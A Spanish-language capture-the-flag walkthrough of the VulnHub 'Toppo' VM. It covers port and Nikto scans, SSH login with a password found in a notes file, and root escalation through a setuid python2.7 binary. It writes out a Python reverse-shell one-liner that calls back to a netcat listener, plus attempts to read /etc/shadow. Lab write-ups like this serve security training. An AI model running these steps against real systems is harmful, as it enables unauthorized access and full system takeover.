Esta web utiliza cookies, puedes ver nuestra política de cookies aquí. Si continuas navegando estás aceptándola


Nos bajamos la imagen de VBox de VulnHub o de alfaexploit:,245/

Echamos un vistazo a los servicios ofrecidos:

RX4 ☢ /home/kr0m> nmap -sT -p 0-65535
Starting Nmap 7.70 ( ) at 2018-09-03 16:46 CEST
Nmap scan report for
Host is up (0.00056s latency).
Not shown: 65532 closed ports
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
56149/tcp open  unknown
MAC Address: 08:00:27:52:19:08 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds

Lanzamos Nikto a ver que nos muestra:

RX4 ☢ /home/kr0m/nikto/program> ./ -h
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2018-09-03 16:48:23 (GMT2)
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.25). Apache 2.2.31 is also current for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7796 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2018-09-03 16:48:32 (GMT2) (9 seconds)
+ 1 host(s) tested

Accediendo mediante Firefox vemos que existe un fichero llamado notes.txt

RX4 ☢ /home/kr0m> curl
Note to myself :
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .

Con un poco de suerte tenemos acceso:

RX4 ☢ /home/kr0m> ssh ted@
ted@'s password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 15 12:33:00 2018 from
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Nos bajamos linuxprivchecker:

chmod 700

[+] Shadow File (Privileged)

El script en python es capaz de dumpear el shadow sin permisos?

ted@Toppo:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied

Seguimos investigando:

ted@Toppo:~$ ls -la /usr/bin/python
lrwxrwxrwx 1 root root 9 Mar 16  2015 /usr/bin/python -> python2.7

ted@Toppo:~$ ls -la /usr/bin/python2.7
-rwsrwxrwx 1 root root 3889608 Aug 13  2016 /usr/bin/python2.7

Ese setUID bueno, una vez mas vemos como unos permisos mal asignados pueden comprometer el sistema entero

Probamos a lanzar una shell desde el interprete de python:

ted@Toppo:~$ python -c "import pty;pty.spawn('/bin/bash')"
bash-4.3$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
bash-4.3$ cat /etc/shadow
cat: /etc/shadow: Permission denied

Intentemos una conexión reversa:

RX4 ✺ ~> nc -l -p 1234
ted@Toppo:~$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'
RX4 ✺ ~> nc -l -p 1234
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Autor: Kr0m -- 15/09/2018 19:58:50